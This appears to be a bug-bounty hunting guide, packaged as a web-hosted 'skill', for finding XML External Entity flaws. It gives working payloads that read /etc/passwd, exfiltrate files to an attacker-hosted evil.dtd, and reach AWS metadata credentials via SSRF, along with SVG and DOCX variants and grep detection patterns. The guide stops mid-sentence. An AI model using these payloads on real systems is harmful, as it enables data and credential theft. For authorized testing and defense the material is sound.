Crown Jewel Targets

XXE is a critical-severity vulnerability that consistently pays at the top of bug bounty scales ($5,000–$30,000+) due to its direct path to sensitive data exfiltration and SSRF. Highest-value targets:

Large enterprise platforms with XML-heavy backend integrations (finance, logistics, ride-sharing APIs)
Domains with file-read capability — /etc/passwd, /etc/shadow, internal config files, AWS metadata endpoints
Subdomains sharing backend infrastructure — one XXE endpoint can pivot to internal services across dozens of domains (as demonstrated by 26+ Uber domains via a single entry point)
API gateways accepting XML content types — especially REST APIs that silently accept Content-Type: application/xml
File upload features — SVG, DOCX, XLSX, PDF, PPTX parsers on the server side
SAML/SSO endpoints — SAML assertions are XML-based and frequently vulnerable
Office/document processing services — any feature that converts or processes user-supplied documents

Attack Surface Signals

URL Patterns

/api/v*/xml
/upload
/import
/parse
/convert
/saml/acs
/sso/saml
/feed
/rss
/sitemap
/webdav
/soap/*
/wsdl
/service.asmx
/xmlrpc
/graphql (multipart with XML)

Request/Response Headers

Content-Type: application/xml
Content-Type: text/xml
Content-Type: application/soap+xml
Content-Type: multipart/form-data  ← check file upload fields
Accept: application/xml
X-Content-Type-Options: (absent — good sign of loose parsing)

JavaScript Patterns (source recon)

// Look for in JS bundles
XMLSerializer
DOMParser
parseFromString
new ActiveXObject("Microsoft.XMLDOM")
$.parseXML(
xml2js
libxmljs
lxml

Tech Stack Signals

Java stacks: Spring, Struts, JAX-WS — default XML parsers (SAX, DOM) are XXE-vulnerable without explicit hardening
PHP: simplexml_load_string(), DOMDocument::loadXML() — vulnerable by default pre-PHP 8
Python: lxml, xml.etree (safe by default), xml.sax (unsafe)
Ruby: Nokogiri older versions, REXML
Node.js: xml2js, libxmljs, fast-xml-parser (older versions)
WSDL/SOAP services: Always test — legacy XML parsing virtually guaranteed
File parsers: Apache POI (Java), python-docx, LibreOffice integrations

Step-by-Step Hunting Methodology

Map every XML entry point — Use Burp Suite passive scanner to flag all requests/responses with XML content types. Also intercept JSON endpoints and manually swap Content-Type to application/xml with equivalent XML body.
Identify file upload features — Upload SVG, DOCX, XLSX, and observe if the server processes/renders content. These are often XML under the hood.
Attempt inline XXE (classic file read) — Replace the XML body with a basic entity test payload targeting /etc/passwd or C:\Windows\win.ini. Observe if the value is reflected in the response.
If no reflection, pivot to Blind OOB — Set up an OOB listener (Burp Collaborator, interactsh, or a self-hosted netcat server). Inject an external entity pointing to your callback URL. Confirm DNS/HTTP hit to validate the parser is making outbound connections.
Escalate Blind OOB to file exfiltration — Use a two-stage payload: first entity loads local file, second entity sends it OOB via HTTP parameter or DNS exfiltration.
Test SSRF pivot — Point the external entity at internal network addresses (http://169.254.169.254/latest/meta-data/, http://10.0.0.1/, http://localhost:8080/admin). Look for differences in response timing or error messages.
Test all subdomains sharing the same backend — If one subdomain is vulnerable, enumerate and test all others systematically. Shared backend infrastructure means shared vulnerability.
Test parameter-level injection — Some endpoints parse only specific XML nodes. Inject entities into every element value, attribute value, and even element names.
Test for error-based exfiltration — If OOB is blocked, trigger XML parsing errors that include file content in the error message returned to the client.
Document the full impact chain — Demonstrate: file read → SSRF → internal service access → note which internal domains/IPs are reachable.

Payload & Detection Patterns

Classic In-Band File Read

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>

Windows Equivalent

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<root><data>&xxe;</data></root>

Blind OOB — DNS/HTTP Callback

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://YOUR.BURPCOLLABORATOR.net/xxe-test">
]>
<root><data>&xxe;</data></root>

Blind OOB — File Exfiltration via Parameter Entity (two-stage)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://YOUR-SERVER/evil.dtd">
  %dtd;
]>
<root><data>trigger</data></root>

evil.dtd (hosted on attacker server):

<!ENTITY % all "<!ENTITY send SYSTEM 'http://YOUR-SERVER/?data=%file;'>">
%all;

SSRF via XXE (AWS Metadata)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&ssrf;</data></root>

SVG XXE (for file upload endpoints)

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<svg width="512px" height="512px" xmlns="http://www.w3.org/2000/svg">
  <text font-size="14" x="0" y="16">&xxe;</text>
</svg>

DOCX/XLSX XXE — Inject into `[Content_Types].xml` or `word/document.xml`

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Types xmlns="..."><Default Extension="rels" ContentType="&xxe;"/></Types>

Content-Type Swap (JSON to XML)

# Original JSON request
curl -X POST https://target.com/api/endpoint \
  -H "Content-Type: application/json" \
  -d '{"user":"test"}'

# Converted to XML for XXE testing
curl -X POST https://target.com/api/endpoint \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://COLLABORATOR.net">]><user>&xxe;</user>'

Grep Patterns for Source Code Review

# PHP
grep -rn "simplexml_load_string\|DOMDocument\|xml_parse\|loadXML\|SimpleXMLElement" .

# Java
grep -rn "DocumentBuilder\|SAXParser\|XMLReader\|XMLInputFactory\|TransformerFactory" .

# Python
grep -rn "lxml\|xml.sax\|parseString\|fromstring\|etree.parse" .

# Look for missing hardening
grep -rn "FEATURE_EXTERNAL_GENERAL_ENTITIES\|setExpandEntityReferences\|setFeature.*false" .

Common Root Causes

Default parser configurations — Java's DocumentBuilderFactory, PHP's DOMDocument, and Python's lxml all support external entities by default. Developers use them without reading the security docs.
Framework upgrades without security re-review — Older versions of Spring, Struts, and similar frameworks enabled XXE by default; developers didn't re-audit XML handling when libraries changed.
Hidden XML consumption — Developers accept JSON at the API layer but convert to XML internally, or use libraries (Apache POI, python-docx) to process uploads without realizing those formats are XML containers.
Copy-paste code from StackOverflow — XML parsing examples online rarely include entity disabling. Developers copy minimal working examples straight into production.
SAML/SSO library misconfigurations — SSO integrations often delegate XML parsing to third-party libraries with XXE enabled; developers assume "library handles security."
Testing gaps on non-primary content types — QA

hunt-xxe

How to add

Drop this on your repo README

Related skills

pdf

pptx

docx

canvas-design

Get new Documentos skills every Monday

Crown Jewel Targets

Attack Surface Signals

URL Patterns

Request/Response Headers

JavaScript Patterns (source recon)

Tech Stack Signals

Step-by-Step Hunting Methodology

Payload & Detection Patterns

Classic In-Band File Read

Windows Equivalent

Blind OOB — DNS/HTTP Callback

Blind OOB — File Exfiltration via Parameter Entity (two-stage)

SSRF via XXE (AWS Metadata)

SVG XXE (for file upload endpoints)

DOCX/XLSX XXE — Inject into `[Content_Types].xml` or `word/document.xml`

Content-Type Swap (JSON to XML)

Grep Patterns for Source Code Review

Common Root Causes

Comments · No comments

How to add

Drop this on your repo README

Related skills

pdf

pptx

docx

canvas-design

Get new Documentos skills every Monday

Crown Jewel Targets

Attack Surface Signals

URL Patterns

Request/Response Headers

JavaScript Patterns (source recon)

Tech Stack Signals

Step-by-Step Hunting Methodology

Payload & Detection Patterns

Classic In-Band File Read

Windows Equivalent

Blind OOB — DNS/HTTP Callback

Blind OOB — File Exfiltration via Parameter Entity (two-stage)

SSRF via XXE (AWS Metadata)

SVG XXE (for file upload endpoints)

DOCX/XLSX XXE — Inject into [Content_Types].xml or word/document.xml

Content-Type Swap (JSON to XML)

Grep Patterns for Source Code Review

Common Root Causes

Comments · No comments

DOCX/XLSX XXE — Inject into `[Content_Types].xml` or `word/document.xml`